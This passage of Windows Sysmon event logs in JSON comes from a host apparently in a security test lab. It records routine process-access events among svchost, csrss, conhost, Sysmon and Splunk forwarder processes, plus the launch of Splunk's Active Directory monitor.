{E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8797,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8798,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:56.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A0-5F25-0000-001033991000}\r\nTargetProcessId: 2512\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:56.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A0-5F25-0000-001033991000}","TargetProcessId":"2512","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8799,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nProcessGuid: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nProcessId: 2520\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","ProcessGuid":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8800,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","TargetProcessId":"2520","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8801,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-00101F9B1000}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-00101F9B1000}","TargetProcessId":"2520","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
